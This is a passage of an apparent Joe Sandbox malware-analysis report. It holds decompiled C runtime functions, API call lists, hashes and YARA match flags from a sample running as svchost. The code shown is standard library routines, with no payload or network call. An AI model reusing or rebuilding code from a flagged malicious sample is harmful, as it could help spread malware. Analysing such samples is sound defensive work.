                                                0x6fd57632
                                                0x00000000
                                                0x6fd57630
                                                0x6fd5759b
                                                0x00000000

                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 6FD5756B
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 6FD575E5
                                                  • Part of subcall function 6FD5F960: __FindPESection.LIBCMT ref: 6FD5F9B9
                                                • _ValidateLocalCookies.LIBCMT ref: 6FD57659
                                                • _ValidateLocalCookies.LIBCMT ref: 6FD57684
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentFindImageNonwritableSection
                                                • String ID: csm
                                                • API String ID: 1685366865-1018135373
                                                • Opcode ID: 751d27cd8949fa1803e689dd79bcd68a2d549dd4607daa670a4d82afd4568c60
                                                • Instruction ID: 05d63399212fc0dfc2401b1b40dd2ea9a3f0bc0733a5649ac51a529a7f6bb5a2
                                                • Opcode Fuzzy Hash: 751d27cd8949fa1803e689dd79bcd68a2d549dd4607daa670a4d82afd4568c60
                                                • Instruction Fuzzy Hash: C8416034D04309EBCF81CF69C880A9EBBB5AF45329F24C156D8295B395D731FA25CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD547E0 Relevance: 8.8, APIs: 7, Instructions: 68COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 95%
                                                			E6FD547E0() {
				void* _t9;
				intOrPtr _t10;
				intOrPtr _t13;
				void* _t14;
				void* _t15;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				signed int _t24;
				signed int _t25;
				void* _t26;

				EnterCriticalSection(0x6fd6ac7c);
				_t20 =  *0x6fd6ac98; // 0x14
				_t24 = 0;
				if(_t20 == 0) {
					L9:
					 *0x6fd6ac98 = 0;
					E6FD54C30();
					LeaveCriticalSection(0x6fd6ac7c);
					EnterCriticalSection(0x6fd6ac54);
					_t21 =  *0x6fd6ac70; // 0x6
					_t25 = 0;
					if(_t21 == 0) {
						L14:
						 *0x6fd6ac70 = 0;
						_t9 = E6FD54BC0();
						LeaveCriticalSection(0x6fd6ac54);
						return _t9;
					}
					if(0 >= _t21) {
						L13:
						_t25 = _t25 + 1;
						if(_t25 < _t21) {
							goto L11;
						}
						goto L14;
					}
					L11:
					_t10 =  *0x6fd6ac6c; // 0x30300a8
					_t22 =  *((intOrPtr*)(_t10 + _t25 * 4));
					if(_t22 != 0) {
						LocalFree( *(_t22 + 8));
						_push(0xc);
						E6FD559E2(_t22);
						_t21 =  *0x6fd6ac70; // 0x6
						_t26 = _t26 + 8;
					}
					goto L13;
				}
				if(0 >= _t20) {
					L8:
					_t24 = _t24 + 1;
					if(_t24 < _t20) {
						goto L2;
					}
					goto L9;
				}
				L2:
				_t13 =  *0x6fd6ac94; // 0x304ebb8
				_t23 =  *((intOrPtr*)(_t13 + _t24 * 4));
				if(_t23 != 0) {
					_t14 =  *(_t23 + 0x50);
					if(_t14 != 0) {
						LocalFree(_t14);
					}
					_t15 =  *(_t23 + 0x54);
					if(_t15 != 0) {
						LocalFree(_t15);
					}
					_push(0x58);
					E6FD559E2(_t23);
					_t20 =  *0x6fd6ac98; // 0x14
					_t26 = _t26 + 8;
				}
				goto L8;
			}















                                                0x6fd547e8
                                                0x6fd547ee
                                                0x6fd547f4
                                                0x6fd547fe
                                                0x6fd5483a
                                                0x6fd5483a
                                                0x6fd54844
                                                0x6fd5484e
                                                0x6fd54859
                                                0x6fd5485f
                                                0x6fd54865
                                                0x6fd54869
                                                0x6fd54896
                                                0x6fd54896
                                                0x6fd548a0
                                                0x6fd548aa
                                                0x6fd548b3
                                                0x6fd548b3
                                                0x6fd5486d
                                                0x6fd54891
                                                0x6fd54891
                                                0x6fd54894
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd54894
                                                0x6fd5486f
                                                0x6fd5486f
                                                0x6fd54874
                                                0x6fd54879
                                                0x6fd5487e
                                                0x6fd54880
                                                0x6fd54883
                                                0x6fd54888
                                                0x6fd5488e
                                                0x6fd5488e
                                                0x00000000
                                                0x6fd54879
                                                0x6fd54802
                                                0x6fd54835
                                                0x6fd54835
                                                0x6fd54838
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd54838
                                                0x6fd54804
                                                0x6fd54804
                                                0x6fd54809
                                                0x6fd5480e
                                                0x6fd54810
                                                0x6fd54815
                                                0x6fd54818
                                                0x6fd54818
                                                0x6fd5481a
                                                0x6fd5481f
                                                0x6fd54822
                                                0x6fd54822
                                                0x6fd54824
                                                0x6fd54827
                                                0x6fd5482c
                                                0x6fd54832
                                                0x6fd54832
                                                0x00000000

                                                APIs
                                                • EnterCriticalSection.KERNEL32(6FD6AC7C,73B76490,?,?,6FD548CB,?,6FD5546F), ref: 6FD547E8
                                                • LocalFree.KERNEL32(?,?,?,6FD548CB,?,6FD5546F), ref: 6FD54818
                                                • LocalFree.KERNEL32(?,?,?,6FD548CB,?,6FD5546F), ref: 6FD54822
                                                • LeaveCriticalSection.KERNEL32(6FD6AC7C,?,?,6FD548CB,?,6FD5546F), ref: 6FD5484E
                                                • EnterCriticalSection.KERNEL32(6FD6AC54,?,?,6FD548CB,?,6FD5546F), ref: 6FD54859
                                                • LocalFree.KERNEL32(?,?,?,6FD548CB,?,6FD5546F), ref: 6FD5487E
                                                • LeaveCriticalSection.KERNEL32(6FD6AC54,?,?,6FD548CB,?,6FD5546F), ref: 6FD548AA
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: CriticalSection$FreeLocal$EnterLeave
                                                • String ID:
                                                • API String ID: 4044747872-0
                                                • Opcode ID: 51c49a4a2d5b0007ee179aa4f7e03fb0d228c30cfcf967c87231421ca1a86943
                                                • Instruction ID: 555f2aea32af65e921c1b21407d8b8ff8b2717b90340823fcce80620cede7a86
                                                • Opcode Fuzzy Hash: 51c49a4a2d5b0007ee179aa4f7e03fb0d228c30cfcf967c87231421ca1a86943
                                                • Instruction Fuzzy Hash: 9F11BB39500A61DBFF509F54C894ABD7B64BF46666F060019D89597240CF24F435D772
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03992530 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0399255D
                                                • ___std_exception_copy.LIBVCRUNTIME ref: 039925CC
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 039925E4
                                                  • Part of subcall function 0399C8FB: RaiseException.KERNEL32(?,?,?,03998FCF,73B75870,73B76490,73BCF7E0,?,?,?,?,?,03998FCF,?,039BE8EC), ref: 0399C95A
                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 039925EB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::_$ExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrow___std_exception_copy
                                                • String ID: bad locale name
                                                • API String ID: 2988018378-1405518554
                                                • Opcode ID: 1011b57f94f06df9da04fa7fbd1bb4ff17eb3a297b1ce1aeb0dfe160decf3219
                                                • Instruction ID: 49dddd1d2371f9564c6adef08cb1138ba3bbd5f02c1195a8b98470425c32ec5e
                                                • Opcode Fuzzy Hash: 1011b57f94f06df9da04fa7fbd1bb4ff17eb3a297b1ce1aeb0dfe160decf3219
                                                • Instruction Fuzzy Hash: 74217CB18147489EDB20CFA9C904BCFBBF8EF19714F004A5EE485A7741E775A6088BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD5963D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6FD595EE,00000003,?,6FD5958E,00000003,6FD66A10,0000000C,6FD596D6,00000003,00000002), ref: 6FD5965D
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6FD59670
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,6FD595EE,00000003,?,6FD5958E,00000003,6FD66A10,0000000C,6FD596D6,00000003,00000002,00000000), ref: 6FD59693
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 73237deef8f5cced88e2969c3c3e1354c005015f5fd771fa416b0e87bb2ac136
                                                • Instruction ID: 60bbf3e59d929e53324deb59b2b206f284010b99e2038dcc5234bb8b310ea39a
                                                • Opcode Fuzzy Hash: 73237deef8f5cced88e2969c3c3e1354c005015f5fd771fa416b0e87bb2ac136
                                                • Instruction Fuzzy Hash: 1BF06275900608FBDF419FA0CC09BEEBFB4EF46B62F044169F805A2140CB35B964CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039A2612 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,039A25C3,00000003,?,039A2563,00000003,039BECD8,0000000C,039A26AB,00000003,00000002), ref: 039A2632
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 039A2645
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,039A25C3,00000003,?,039A2563,00000003,039BECD8,0000000C,039A26AB,00000003,00000002,00000000), ref: 039A2668
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 4e1908845f579fcfc778117ca69d94cb8fae63d1ab77a7b0bf854c59e386748a
                                                • Instruction ID: 0f748b50a54184bb90fd8601b0432ce38ef30d496824ab01b544f2c239913bb9
                                                • Opcode Fuzzy Hash: 4e1908845f579fcfc778117ca69d94cb8fae63d1ab77a7b0bf854c59e386748a
                                                • Instruction Fuzzy Hash: 02F0AF30A09608BFCF00EF96D909BAEBFB8EF48651F040169F805AA251EB318941DA90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD58FB4 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 96%
                                                			E6FD58FB4(void* __ebx, void* __edx, void* __edi, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				int _v20;
				int _v24;
				char* _v28;
				int _v32;
				char _v36;
				intOrPtr _v44;
				char _v48;
				void* __esi;
				signed int _t59;
				char* _t61;
				intOrPtr _t63;
				int _t64;
				intOrPtr* _t65;
				signed int _t68;
				intOrPtr* _t71;
				short* _t73;
				int _t74;
				int _t76;
				char _t78;
				short* _t83;
				short _t85;
				int _t91;
				int _t93;
				char* _t98;
				int _t103;
				char* _t105;
				void* _t106;
				intOrPtr _t108;
				intOrPtr _t109;
				int _t110;
				short* _t113;
				int _t114;
				int _t115;
				signed int _t116;

				_t106 = __edx;
				_t59 =  *0x6fd68008; // 0xc92c5105
				_v8 = _t59 ^ _t116;
				_t61 = _a4;
				_t91 = _a12;
				_t115 = 0;
				_v28 = _t61;
				_v20 = 0;
				_t113 = _a8;
				_v24 = _t113;
				if(_t61 == 0 || _t91 != 0) {
					if(_t113 != 0) {
						E6FD58DF3(_t91,  &_v48, _t106, _a16);
						_t98 = _v28;
						if(_t98 == 0) {
							_t63 = _v44;
							if( *((intOrPtr*)(_t63 + 0xa8)) != _t115) {
								_t64 = WideCharToMultiByte( *(_t63 + 8), _t115, _t113, 0xffffffff, _t115, _t115, _t115,  &_v20);
								if(_t64 == 0 || _v20 != _t115) {
									L55:
									_t65 = E6FD5A350();
									_t114 = _t113 | 0xffffffff;
									 *_t65 = 0x2a;
									goto L56;
								} else {
									_t53 = _t64 - 1; // -1
									_t114 = _t53;
									L56:
									if(_v36 != 0) {
										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
									}
									goto L59;
								}
							}
							_t68 =  *_t113 & 0x0000ffff;
							if(_t68 == 0) {
								L51:
								_t114 = _t115;
								goto L56;
							}
							while(_t68 <= 0xff) {
								_t113 =  &(_t113[1]);
								_t115 = _t115 + 1;
								_t68 =  *_t113 & 0x0000ffff;
								if(_t68 != 0) {
									continue;
								}
								goto L51;
							}
							goto L55;
						}
						_t108 = _v44;
						if( *((intOrPtr*)(_t108 + 0xa8)) != _t115) {
							if( *((intOrPtr*)(_t108 + 4)) != 1) {
								_t114 = WideCharToMultiByte( *(_t108 + 8), _t115, _t113, 0xffffffff, _t98, _t91, _t115,  &_v20);
								if(_t114 == 0) {
									if(_v20 != _t115 || GetLastError() != 0x7a) {
										L45:
										_t71 = E6FD5A350();
										_t115 = _t115 | 0xffffffff;
										 *_t71 = 0x2a;
										goto L51;
									} else {
										if(_t91 == 0) {
											goto L56;
										}
										_t73 = _v24;
										while(1) {
											_t109 = _v44;
											_t103 =  *(_t109 + 4);
											if(_t103 > 5) {
												_t103 = 5;
											}
											_t74 = WideCharToMultiByte( *(_t109 + 8), _t115, _t73, 1,  &_v16, _t103, _t115,  &_v20);
											_t93 = _a12;
											_t110 = _t74;
											if(_t110 == 0 || _v20 != _t115 || _t110 < 0 || _t110 > 5) {
												goto L55;
											}
											if(_t110 + _t114 > _t93) {
												goto L56;
											}
											_t76 = _t115;
											_v32 = _t76;
											if(_t110 <= 0) {
												L43:
												_t73 = _v24 + 2;
												_v24 = _t73;
												if(_t114 < _t93) {
													continue;
												}
												goto L56;
											}
											_t105 = _v28;
											while(1) {
												_t78 =  *((intOrPtr*)(_t116 + _t76 - 0xc));
												 *((char*)(_t105 + _t114)) = _t78;
												if(_t78 == 0) {
													goto L56;
												}
												_t76 = _v32 + 1;
												_t114 = _t114 + 1;
												_v32 = _t76;
												if(_t76 < _t110) {
													continue;
												}
												goto L43;
											}
											goto L56;
										}
										goto L55;
									}
								}
								if(_v20 != _t115) {
									goto L45;
								}
								_t28 = _t114 - 1; // -1
								_t115 = _t28;
								goto L51;
							}
							if(_t91 == 0) {
								L21:
								_t115 = WideCharToMultiByte( *(_t108 + 8), _t115, _t113, _t91, _t98, _t91, _t115,  &_v20);
								if(_t115 == 0 || _v20 != 0) {
									goto L45;
								} else {
									if(_v28[_t115 - 1] == 0) {
										_t115 = _t115 - 1;
									}
									goto L51;
								}
							}
							_t83 = _t113;
							_v24 = _t91;
							while( *_t83 != _t115) {
								_t83 =  &(_t83[1]);
								_t16 =  &_v24;
								 *_t16 = _v24 - 1;
								if( *_t16 != 0) {
									continue;
								}
								break;
							}
							if(_v24 != _t115 &&  *_t83 == _t115) {
								_t91 = (_t83 - _t113 >> 1) + 1;
							}
							goto L21;
						}
						if(_t91 == 0) {
							goto L51;
						}
						while( *_t113 <= 0xff) {
							_t98[_t115] =  *_t113;
							_t85 =  *_t113;
							_t113 =  &(_t113[1]);
							if(_t85 == 0) {
								goto L51;
							}
							_t115 = _t115 + 1;
							if(_t115 < _t91) {
								continue;
							}
							goto L51;
						}
						goto L45;
					}
					 *((intOrPtr*)(E6FD5A350())) = 0x16;
					E6FD5A294();
					goto L59;
				} else {
					L59:
					return E6FD5599E(_v8 ^ _t116, _t115);
				}
			}







































                                                0x6fd58fb4
                                                0x6fd58fbc
                                                0x6fd58fc3
                                                0x6fd58fc6
                                                0x6fd58fca
                                                0x6fd58fce
                                                0x6fd58fd0
                                                0x6fd58fd3
                                                0x6fd58fd7
                                                0x6fd58fda
                                                0x6fd58fdf
                                                0x6fd58fee
                                                0x6fd5900e
                                                0x6fd59013
                                                0x6fd59018
                                                0x6fd591b5
                                                0x6fd591be
                                                0x6fd591f0
                                                0x6fd591f8
                                                0x6fd59204
                                                0x6fd59204
                                                0x6fd59209
                                                0x6fd5920c
                                                0x00000000
                                                0x6fd591ff
                                                0x6fd591ff
                                                0x6fd591ff
                                                0x6fd59212
                                                0x6fd59216
                                                0x6fd5921b
                                                0x6fd5921b
                                                0x00000000
                                                0x6fd59222
                                                0x6fd591f8
                                                0x6fd591c0
                                                0x6fd591c6
                                                0x6fd591de
                                                0x6fd591de
                                                0x00000000
                                                0x6fd591de
                                                0x6fd591cd
                                                0x6fd591d2
                                                0x6fd591d5
                                                0x6fd591d6
                                                0x6fd591dc
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd591dc
                                                0x00000000
                                                0x6fd591cd
                                                0x6fd5901e
                                                0x6fd59027
                                                0x6fd59061
                                                0x6fd590da
                                                0x6fd590de
                                                0x6fd590f4
                                                0x6fd591a5
                                                0x6fd591a5
                                                0x6fd591aa
                                                0x6fd591ad
                                                0x00000000
                                                0x6fd59109
                                                0x6fd5910b
                                                0x00000000
                                                0x00000000
                                                0x6fd59111
                                                0x6fd59114
                                                0x6fd59114
                                                0x6fd59117
                                                0x6fd5911d
                                                0x6fd59121
                                                0x6fd59121
                                                0x6fd59133
                                                0x6fd59139
                                                0x6fd5913c
                                                0x6fd59140
                                                0x00000000
                                                0x00000000
                                                0x6fd59165
                                                0x00000000
                                                0x00000000
                                                0x6fd5916b
                                                0x6fd5916d
                                                0x6fd59172
                                                0x6fd59192
                                                0x6fd59195
                                                0x6fd59198
                                                0x6fd5919d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd591a3
                                                0x6fd59174
                                                0x6fd59177
                                                0x6fd59177
                                                0x6fd5917b
                                                0x6fd59180
                                                0x00000000
                                                0x00000000
                                                0x6fd59189
                                                0x6fd5918a
                                                0x6fd5918b
                                                0x6fd59190
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd59190
                                                0x00000000
                                                0x6fd59177
                                                0x00000000
                                                0x6fd59114
                                                0x6fd590f4
                                                0x6fd590e3
                                                0x00000000
                                                0x00000000
                                                0x6fd590e9
                                                0x6fd590e9
                                                0x00000000
                                                0x6fd590e9
                                                0x6fd59065
                                                0x6fd5908b
                                                0x6fd5909e
                                                0x6fd590a2
                                                0x00000000
                                                0x6fd590b2
                                                0x6fd590ba
                                                0x6fd590c0
                                                0x6fd590c0
                                                0x00000000
                                                0x6fd590ba
                                                0x6fd590a2
                                                0x6fd59067
                                                0x6fd59069
                                                0x6fd5906c
                                                0x6fd59071
                                                0x6fd59074
                                                0x6fd59074
                                                0x6fd59078
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd59078
                                                0x6fd5907d
                                                0x6fd5908a
                                                0x6fd5908a
                                                0x00000000
                                                0x6fd5907d
                                                0x6fd5902b
                                                0x00000000
                                                0x00000000
                                                0x6fd59036
                                                0x6fd59041
                                                0x6fd59044
                                                0x6fd59047
                                                0x6fd5904d
                                                0x00000000
                                                0x00000000
                                                0x6fd59053
                                                0x6fd59056
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd59058
                                                0x00000000
                                                0x6fd59036
                                                0x6fd58ff5
                                                0x6fd58ffb
                                                0x00000000
                                                0x6fd58fe5
                                                0x6fd59224
                                                0x6fd59234
                                                0x6fd59234

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f0b2892b2aa6b1298853f2351f889b4c9006cb319cb5da5cbd881233a867b636
                                                • Instruction ID: 692836a2c4149090a8fbb9e241ac63d96ec1ed543e10dfb6385e72ddce0b4e2d
                                                • Opcode Fuzzy Hash: f0b2892b2aa6b1298853f2351f889b4c9006cb319cb5da5cbd881233a867b636
                                                • Instruction Fuzzy Hash: 4D71F7B1904326DBEF518F98CC44AEFBB75FF46320F14422AE86457188D770B861CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039A99C5 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cf00a4109b361b36d1075618d7917791101b32b54fdc2d96fc6d01fcae62f3d8
                                                • Instruction ID: 23e20f3fcaa68d657fb97a1256243833e41ddea816dc3f3b58107f16e6eecb2e
                                                • Opcode Fuzzy Hash: cf00a4109b361b36d1075618d7917791101b32b54fdc2d96fc6d01fcae62f3d8
                                                • Instruction Fuzzy Hash: DD71AC35904A1B9BDF20DB5DC884ABEFBBDFB462A4F184769E41957180DB708941C7E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039A7492 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$AllocateHeap
                                                • String ID:
                                                • API String ID: 3033488037-0
                                                • Opcode ID: 8c8b8bb29a40cce5c997c4d3edc082b739a4a5926a92751a214c15808cbd893d
                                                • Instruction ID: 1c734c9d78bd06729ddd84d5bb9f745acdd3c4af3be51858f7b98b5aea936253
                                                • Opcode Fuzzy Hash: 8c8b8bb29a40cce5c997c4d3edc082b739a4a5926a92751a214c15808cbd893d
                                                • Instruction Fuzzy Hash: 9C519335A04B04AFDB21DFEDD842A6AB7F9EF84760F184659E909DB250E731D901CBD0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD59B1D Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 82%
                                                			E6FD59B1D(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x6fd68008; // 0xc92c5105
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E6FD599DE( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E6FD5864B(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E6FD5864B(_t78 + 4);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E6FD5864B(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E6FD5BC9C(_t56);
						_t40 = E6FD59FB4(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E6FD5BC9C(_t56);
						E6FD59FB4(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x6fd68008;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

























                                                0x6fd59b1d
                                                0x6fd59b27
                                                0x6fd59b2b
                                                0x6fd59b2d
                                                0x6fd59b31
                                                0x6fd59b3b
                                                0x6fd59b4c
                                                0x6fd59b51
                                                0x6fd59b53
                                                0x6fd59b55
                                                0x6fd59b57
                                                0x6fd59b59
                                                0x6fd59b5d
                                                0x6fd59c17
                                                0x6fd59c25
                                                0x6fd59c27
                                                0x6fd59c2c
                                                0x6fd59c33
                                                0x6fd59c43
                                                0x6fd59c52
                                                0x6fd59c55
                                                0x6fd59c57
                                                0x00000000
                                                0x6fd59c58
                                                0x6fd59b65
                                                0x6fd59b6a
                                                0x6fd59b6f
                                                0x6fd59b71
                                                0x6fd59b71
                                                0x6fd59b73
                                                0x6fd59b78
                                                0x6fd59b7c
                                                0x6fd59b7c
                                                0x6fd59b7f
                                                0x6fd59b9e
                                                0x6fd59b9e
                                                0x6fd59ba0
                                                0x6fd59ba3
                                                0x6fd59bac
                                                0x6fd59baf
                                                0x6fd59bb4
                                                0x6fd59bb7
                                                0x6fd59bbc
                                                0x00000000
                                                0x00000000
                                                0x6fd59bbe
                                                0x00000000
                                                0x6fd59b81
                                                0x6fd59b81
                                                0x6fd59b83
                                                0x6fd59b8c
                                                0x6fd59b8f
                                                0x6fd59b94
                                                0x6fd59b97
                                                0x6fd59b9c
                                                0x6fd59bc6
                                                0x6fd59bc9
                                                0x6fd59bcb
                                                0x6fd59bce
                                                0x6fd59bd6
                                                0x6fd59bdc
                                                0x6fd59be3
                                                0x6fd59be5
                                                0x6fd59bed
                                                0x6fd59bfc
                                                0x6fd59c00
                                                0x6fd59c02
                                                0x6fd59c05
                                                0x00000000
                                                0x00000000
                                                0x6fd59c07
                                                0x6fd59c0a
                                                0x6fd59c0c
                                                0x6fd59c0c
                                                0x6fd59c0d
